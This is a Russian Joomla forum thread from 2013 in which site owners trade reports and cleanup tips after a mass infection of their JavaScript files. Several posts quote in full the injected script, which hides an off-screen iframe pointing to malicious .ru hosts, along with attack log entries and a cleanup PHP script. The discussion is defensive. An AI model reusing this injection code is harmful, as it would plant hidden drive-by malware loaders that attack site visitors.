Новости Joomla

Joomla: как тестировать? Всего 8 минут

👩‍💻 Joomla: как тестировать? Всего 8 минут.Над CMS Joomla постоянно ведётся работа: создаётся новый функционал, исправляются ошибки, делаются мелкие правки. Разработка ведётся на GitHub. Изменения оформляются в виде Pull Request (PR). Для того, чтобы изменения могли войти в ядро - их обязательно должны успешно протестировать минимум 2 человека КРОМЕ автора изменений. А помочь с большинством PR можно очень и очень быстро, это не занимает много времени, чему подтверждением служит это видео. Смотреть видео на YouTubeСмотреть на Vk VideoСмотреть на RuTube@joomlafeed#joomla #community #github

JoomGallery 4.1.0 - компонент галереи изображений для Joomla

JoomGallery 4.1.0 - компонент галереи изображений для Joomla

Новая итерация компонента продолжает развиваться, ведь с v.4.x компонент был переписан практически с нуля.

v.4.1.0. Что нового?

Редактирование метаданных изображений. Теперь метаданные можно не только читать, но и напрямую редактировать и записывать обратно в изображение JPG. Поддерживаются данные EXIF ​​и IPTC.

Полная совместимость с Joomla! 4.x, 5.x и 6.x. Компонент почистили от устаревших методов в коде.

Заметно ускорили загрузку больших галерей. Списки в админке, особенно для очень больших галерей ( >30 000 изображений), теперь загружаются значительно быстрее.

Несколько сеток lightGallery на одной странице. Будь то плагины контента или модули изображений: теперь вы можете отображать несколько галерей или категорий на одной странице без каких-либо ограничений.

Множество мелких исправлений ошибок и оптимизаций.

Сайт проекта

GitHub расширения

Скачать

Вышел релиз Joomla 5.3.2

Релиз исправлений ошибок Joomla 5.3.2

Проект Joomla рад сообщить о выпуске Joomla 5.3.2. Это релиз исправлений ошибок для серии Joomla 5.3.

1 2 3 ... 12   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 356 Ответов
  • 74710 Просмотров
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
[Решено] Заразились в один день 4 аккаунта по 10 сайтов
« : 25.03.2013, 13:29:48 »
Левый код в скриптах ниже.
Не могу понять как это попало. Все сайты после последнего заражения в январе обновлены.
JCE везде прибит. Версия Jooma 1.5.26


Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/19.0.2','SymbianOS'];
 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('b1004dc22');
 if (cookie == undefined) {
  setCookie('b1004dc22', true, 3600);	
  document.write('<iframe height="115" width="115" style="position:absolute;left:-1000px;top:-1000px;" src="http://impeccablepreselected.ru/JJJ7P.8Qd6?default"></iframe>');
 }
};
})();/*eaa795220*//* begin Page */

« Последнее редактирование: 10.04.2013, 06:40:55 от AlexSmirnov »
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #1 : 25.03.2013, 19:23:30 »
Так может еще и поискать шелл, бекдор  в файлах сайтов ?
Записан
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #2 : 25.03.2013, 22:02:07 »
Ищу уже сутки
Записан
*

greywolf

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #3 : 26.03.2013, 12:43:51 »
В каких файлах код?
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #4 : 09.04.2013, 05:02:26 »
У меня заразились все *.js файлы 10 сайтов на 1 акке хостинга. Joomla 1.5.26, 2.5.8, 1.7.5.
Яндекс сегодня прислал письмо, что на 1-м из сайтов есть вредоносный код, но раз у меня такая фигня уже была в январе этого года, то я сразу проверил все сайты где есть *.js файлы и все они оказались заражены.
Предыдущий вирусняк менял дату создания (изменения) файла, а этот хитрее - не меняет.

Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/19.0.2','Firefox/20.0','SymbianOS'];
 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('b1004dc22');
 if (cookie == undefined) {
  setCookie('b1004dc22', true, 259200);	
  document.write('<iframe height="115" width="115" style="position:absolute;left:-1000px;top:-1000px;" src="http://hotbarpaying.ru/rejtmn3.cCvNYTc?default"></iframe>');
 }
};
})();/*eaa795220*/
Записан
*

Go-destroy

  • Захожу иногда
  • 221
  • 4 / 1
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #5 : 09.04.2013, 05:52:48 »
стилеры не дремлют...
Записан
*

wishlight

  • Гуру
  • 5053
  • 314 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #6 : 09.04.2013, 08:31:41 »
Не дочистили значит. Ищите шеллы и бекдоры.
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #7 : 09.04.2013, 12:35:50 »
Я забыл упомянуть, что на 1-м из сайтов стояла Joomla 3.0.3 и быстрее всего косяк шёл через неё, т.к. пока 1 из сайтов не был на ней сделан всё было ОК, т.к. до января этого года, а так уже 2-й раз за 3 мес.
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #8 : 09.04.2013, 13:30:37 »
Нашёл подозрительные записи в логах нескольких сайтов
176.9.36.168 - - [08/Apr/2013:19:07:58 +0400] "GET / HTTP/1.1" 200 100534 "-" "-"
178.137.166.129 - - [08/Apr/2013:02:30:35 +0400] "GET /main/about-site.html+%5BPLM=0%5D%5BN%5D+GET+http://site.ru/main/about-site.html+%5B0,48462,76401%5D+-%3E+%5BN%5D+POST+http://site.ru/main/about-site.html+%5B0,0,76401%5D+-%3E+%5BN%5D+GET+http://site.ru/main/about-site.html+%5B75305,0,76401%5D HTTP/1.0" 404 389 "http://www.bestplacevanquepated1978.xpg.com.br/v-kakom-banke-mozhno-vzyat-kredit-v-razmere-ot-700000-do-1000000.html" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
94.77.186.182 - - [08/Apr/2013:18:59:43 +0400] "GET /components/com_phocagallery/assets/images/shahttp://site.ru/administrator/index.php?option=com_content%C2%A7ionid=11&task=edit&cid[]=182 HTTP/1.1" 404 920 "http://site.ru/natali-leshhenko.html" "Opera/9.80 (Windows NT 6.1; Win64; x64; U; Edition Next; ru) Presto/2.11.310 Version/12.50"
178.137.166.129 - - [09/Apr/2013:03:27:27 +0400] "GET /ad/add-ad.html+%5BPLM=0%5D+GET+http://site.ru/ad/add-ad.html+%5B0,42200,50519%5D+-%3E+%5BN%5D+POST+http://site.ru/ad/add-ad.html+%5B0,0,52134%5D HTTP/1.0" 404 389 "http://bestplacetrl6857.boxhost.me/brokery-v-krivoy-rog-vzyat-kredit.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
« Последнее редактирование: 09.04.2013, 13:33:53 от JASON X »
Записан
*

PaLyCH

  • Давно я тут
  • 956
  • 146 / 19
  • Менеджер проектов
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #9 : 09.04.2013, 20:48:01 »
Ну вы внимательно изучали файлы, оказалось что заражено не только начало файла, но еще и конец. В конце можно найти иснтуркцию
Код: html4strict
;;document.write('<iframe src="http://muhost.mrslove.com/7adc59e6.BemrmfFYEukF?default" name="Olegor" height="90" width="90" style="left:-500px;top:0px;position:fixed;"></iframe>');
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #10 : 09.04.2013, 20:55:15 »
Зашёл на свои сайты минут 20 назад проверил и оказалось, что дополнительного вредоносного кода нету, ни на 1-м сайте, но доступ то остался у этих плохих людей....
Записан
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #11 : 09.04.2013, 21:05:14 »
Варез был/есть на тех сайтах?
Записан
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

PaLyCH

  • Давно я тут
  • 956
  • 146 / 19
  • Менеджер проектов
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #12 : 09.04.2013, 21:13:07 »
Цитата: AlexSmirnov от 09.04.2013, 21:05:14
Варез был/есть на тех сайтах?

Походу его там полно.

Цитата: JASON X от 09.04.2013, 20:55:15
Зашёл на свои сайты минут 20 назад проверил и оказалось, что дополнительного вредоносного кода нету, ни на 1-м сайте, но доступ то остался у этих плохих людей....

Дык вроде почистил
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #13 : 10.04.2013, 06:21:17 »
Цитата: AlexSmirnov от 09.04.2013, 21:05:14
Варез был/есть на тех сайтах?
Если Вы имеете в виду скачанные не с оф сайтов расширения, то да, были, в частности и сам шабл. Тем более не всё я делал, что-то и друг делал.
Понятно, что, скажем так, нежелательно использовать варез, но когда я только начинал делать сайты, то не было ни денег ни опыта, новый сайт уже буду создавать учтя все косяки и буду покупать расширения.

Закончил чистку, восстановил все сайты из чистых бэкапов, не стал заморачиватсья со скриптами, которые мне почистят файлы, так для меня проще, тем более что уже опыт есть.
« Последнее редактирование: 10.04.2013, 06:28:16 от JASON X »
Записан
*

nbserg

  • Захожу иногда
  • 166
  • 0 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #14 : 29.04.2013, 19:01:59 »
и что же тут решено?
уязвимость откуда?
раньше
Код
 ;;document.write('<iframe src="http://muhost.mrslove.com/7adc59e6.BemrmfFYEukF?default" name="Olegor" height="90" width="90" style="left:-500px;top:0px;position:fixed;"></iframe>');
это был в JCE
а теперь из за чего?
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #15 : 02.05.2013, 22:43:29 »
Сейчас проверил и опять.... Вот такой код во всех ява скриптах на всех сайтах на аккаунте:
Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function papirosa(){
 var denyList = ['Chrome'];
 var denyUA = false;
 for (var i in denyList) {
  if (stripos(navigator.userAgent, denyList[i])) {
   denyUA = true;
   break;
  }
 }
 return denyUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!papirosa()) {
 var cookie = getCookie('smy01b199cd');
 if (cookie == undefined) {
  setCookie('smy01b199cd', true, 432001);	
  document.write('<iframe height="117" style="position:absolute;left:-1000px;top:-1000px;" width="117" src="http://myobunsubstantiated.ru/juyt9.XTjoha?default"></iframe>');
 }
};
})();/*eaa795220*//**
Какое-то расширение наверно с багом.
Записан
*

LS_D

  • Захожу иногда
  • 155
  • 16 / 0
Re: Заразились в один день 4 аккаунта по 10 сайто&#
« Ответ #16 : 03.05.2013, 00:31:50 »
Тоже самое, главное сменил все пароли и поставил атрибуты 444 на файлы js, так эта зараза меняет атрибуты на 644 и прописывает этот код. У Вас случаем хостер не рег.ру?
Странно, как скрипт прописывающий код в файл может поменять атрибут или это снова рег.ру нас радует.
« Последнее редактирование: 03.05.2013, 00:43:07 от LS_D »
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #17 : 03.05.2013, 00:41:44 »
LS_D тоже менял за этот год поле заражения 2 раза пароли от всего на хостинге (входа в админку хостинга, сайтов, баз данных и т.д.), но всё равно какая-то сволочь всё портит.
Тоже думал о смене прав для ява скриптов, но это вряд ли поможет, т.к. эта хрень получает root права и соответственно может делать что хочет в файлах сайтов.
У меня хостер ihc.ru.
Тут дело не в хостере, а в расширениях, какое-то из них с брешью в безопасности и поэтому через него вирусняк и лезет, а вот какое именно расширение, или может это вообще брешь в самой Joomla 1.5 - это самый большой вопрос.
Записан
*

LS_D

  • Захожу иногда
  • 155
  • 16 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #18 : 03.05.2013, 00:52:58 »
У меня Joomla 2.5 везде, вот только что именно хз, последнее ставил uddeIM, сейчас снесу прочищи и посмотрю
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #19 : 03.05.2013, 01:03:26 »
У меня Jooml'ы разные: Joomla 1.5.26, 1.7.5, 2.5.x. На всех сайтах разные расширения, кроме 1.5.26.
uddeIM у меня ни на1-м из сайтов не установлено.
Сейчас проверил - вирусный скрипт сменился:
Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0';
 blackList = blackList.split('|');

 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])!==false) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('smy01b199cd');
 if (cookie == undefined) {
  setCookie('smy01b199cd', true, 432001);	
  document.write('<iframe height="115" width="115" style="position:absolute;left:-999px;top:-999px;" src="http://fulldug.ru/ifg.benDa?default"></iframe>');
 }
};
})();/*eaa795220*//*
« Последнее редактирование: 03.05.2013, 01:17:27 от JASON X »
Записан
*

Leva27

  • Осваиваюсь на форуме
  • 41
  • 3 / 0
  • Дальвебстудия
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #20 : 03.05.2013, 03:26:53 »
Заругался Яндекс на содержание вредоносного кода на сайте, начал искать, оказывается пролез на сайт в caption.js и progressbar.js код:

Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0';
 blackList = blackList.split('|');

 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])!==false) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('smy01b199cd');
 if (cookie == undefined) {
  setCookie('smy01b199cd', true, 432001);	
  document.write('<iframe height="115" width="115" style="position:absolute;left:-999px;top:-999px;" src="http://ibackupplace.ru/jdruy.PGNbn?default"></iframe>');
 }
};
})();/*eaa795220*//*
		GNU General Public License version 2 or later; see LICENSE.txt
*/
var JCaption=new Class({initialize:function(a){this.selector=a;$$(a).each(function(a){this.createCaption(a)},this)},createCaption:function(a){var f=document.createTextNode(a.title),c=document.createElement("div"),d=document.createElement("p"),e=a.getAttribute("width"),b=a.getAttribute("align");if(!e)e=a.width;b||(b=a.getStyle("float"));if(!b)b=a.style.styleFloat;if(b==""||!b)b="none";d.appendChild(f);d.className=this.selector.replace(".","_");a.parentNode.insertBefore(c,a);c.appendChild(a);a.title!=
""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}});;;

Версия Joomla 2.5.11, расширения стоят нормальные, что вы там про JCE говорили?
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #21 : 03.05.2013, 08:09:14 »
Leva27 проверьте остальные скрипты - он уже во всех есть. У меня заразил около 10 сайтов на 1 акке и ява скрипты заразились все.
Записан
*

LS_D

  • Захожу иногда
  • 155
  • 16 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #22 : 03.05.2013, 08:11:16 »
Это не JCE, я его со всех сайтов давно удалил. Буду разносить сайты клиентов по разным хостингам, пролечивать и смотреть на каком и какое расширение с дырой.
Записан
*

SorokinS

  • Захожу иногда
  • 165
  • 12 / 1
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #23 : 03.05.2013, 10:24:11 »
1-3 мая залили sheell  и опять все JS поражены.

Пользую FLS.PHP (http://joomlaforum.ru/index.php/topic,198048.0.html) и REP.PHP (не помню где брал)
первое ищет подозрительные файлы, второй вырезает нужную часть кода из нужных файлов.

В этом заражении вставлен большой, многострочный код.

Я чет никак не могу его засунуть в код реплейсера, подсобите:

Код
<?php
$root  =  $_SERVER['DOCUMENT_ROOT'];
$search = '[b]СЮДА[/b]'; //строка, которую нужно найти в каждом файле и заменить на ''
$thisfile = 'rep.php'; //чтобы в процессе не заменить искомую строку в этом же файле
function find_and_replace($dir,$search,$thisfile)
{

$new_dir = null;
$dir_files = opendir($dir);
    while(false !== ($file = readdir($dir_files)))
    {

        if($file != '.' && $file != '..')
        $new_dir[] = $dir."/".$file;
    }

        if($new_dir)
        foreach($new_dir as $check )
        {
              if((is_file($check)) && (basename($check)!== $thisfile) && ( (strtolower(substr($check,-4)) === '.tpl') || (strtolower(substr($check,-5)) === '.html') || (strtolower(substr($check,-3)) === '.js'))) {
                $handle = fopen($check, "rb");
                $contents = '';
                while (!feof($handle)) {
                  $contents .= fread($handle, 8192);
                }
                fclose($handle);
                if (strpos($contents,$search)!== false) {
                    $file = fopen ($check,"w+");
                    $str = str_replace($search,'',$contents);
                    fputs($file, $str);
                    fclose ($file);
                    echo $check."<br>";
                    }
              }
              elseif(is_dir($check))
              find_and_replace($check,$search,$thisfile);
        }
}
find_and_replace($root,$search,$thisfile);


JS код заражения:

Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function papirosa(){
 var denyList = ['Chrome'];
 var denyUA = false;
 for (var i in denyList) {
  if (stripos(navigator.userAgent, denyList[i])) {
   denyUA = true;
   break;
  }
 }
 return denyUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!papirosa()) {
 var cookie = getCookie('b19ad018sc');
 if (cookie == undefined) {
  setCookie('b19ad018sc', true, 292200);
  document.write('<iframe height="116" style="position:absolute;left:-1000px;top:-1000px;" width="116" src="http://jivemessageoriented.ru/iy7yhd.dgaPnykU?default"></iframe>');
 }
};
})();/*eaa795220*/
Записан
*

SorokinS

  • Захожу иногда
  • 165
  • 12 / 1
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #24 : 03.05.2013, 10:44:12 »
А в теме написано Решено, а где решение? Найдена дыра? В каком компоненте? Или решение - искать бэкдоры?)
Записан
*

RostovDriver

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #25 : 03.05.2013, 13:13:12 »
+1 к зараженным
Заражены этим же кодом все js на двух хостингах. После чистки js файлов иногда вредоносный код немного изменяется.
В логах ftp коннектов не было. Пароли к ftp, базе, админке хостинга, админкам сайтов изменил, нигде не сохраняются. В /images все чисто.
Месяц назад была подобная трабла, но тогда Касперский все нашел, причем не только код в js, но и кучу всего в php. Сейчас он да и все остальные ничего в упор не видят. Ругается только Sophos от Яндекса. Впрочем, даже локально в полностью выкачанных сайтах он только код в js находит, который появляется заново после чистки. Так что смысла его косить, пока не найдена дыра просто нет. Я так понимаю, основной код где-то сидит и периодически обновляет или заново прописывает код во все файлы js и пока этого "отца" не найдешь, все бесполезно. Прошу, если кто найдет где он спрятался сообщите мне страдальцу.
Чтобы Яндекс не ругался, отключил загрузку всех js во фронтэнде, но таки в админке они грузятся, так что валить их надо.
Ситуация осложнена тем, что дыра может быть на любом, сайте хостинга, а через него уже все остальные портятся. Я уж и на хостера готов эту траблу списать, хотя вообщем-то тоже бесполезно :)
Записан
*

Adrian1111

  • Захожу иногда
  • 271
  • 1 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #26 : 03.05.2013, 14:12:44 »
Аналогичная проблема с кодом в .js

Спойлер
[свернуть]

Заражены наверное все js файлы. Кроме того, наделано куча левых файлов с расширением .php с одинаковым содержимым:

Спойлер
[свернуть]
?>

Вирус видит только Яндекс с Софосом на пару. Больше никто не ругается...пока что...

Сайт Joomla - 2.5. JCE не стоит. При заходе с мобильного никаких редиректов не наблюдаю. Может, потому-что все php. файлы с base64_decode( уже удалил.

Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #27 : 03.05.2013, 14:39:52 »
А вы точно не с одного хостинга ?
п.с.
Кстати у JCE при удалении могли файлы остаться на хостинге.
В менеджере расширений не видно JCE , а таблицы в БД тоже остаются
« Последнее редактирование: 03.05.2013, 15:34:18 от draff »
Записан
*

Adrian1111

  • Захожу иногда
  • 271
  • 1 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #28 : 03.05.2013, 14:51:28 »
У меня хостинг hc.ru.
Записан
*

RostovDriver

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #29 : 03.05.2013, 15:24:26 »
Logol и Kubez
Записан
1 2 3 ... 12   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Изолирование папок сайтов на OpenServer

Автор Lemady

 Ответов: 41
Просмотров: 7327 		Последний ответ 29.11.2021, 15:47:31
от KoreshS
[Решено] В php файлах во всех появилась хрень какая-то появилось давно что это ?

Автор altyn

 Ответов: 72
Просмотров: 37879 		Последний ответ 17.01.2019, 00:51:02
от Roki37
Делаю почту в общих настройках через smtp - в тот же день ящик взломан

Автор Mehanick

 Ответов: 22
Просмотров: 1427 		Последний ответ 25.05.2018, 08:11:19
от dmitry_stas
На мобильном не работает сайт (решено, ошибка в андройде)

Автор dragon4x4

 Ответов: 5
Просмотров: 1846 		Последний ответ 01.03.2018, 22:46:10
от dragon4x4
В админке еще один администратор

Автор Lidia

 Ответов: 26
Просмотров: 2363 		Последний ответ 07.12.2017, 16:55:25
от Fess_N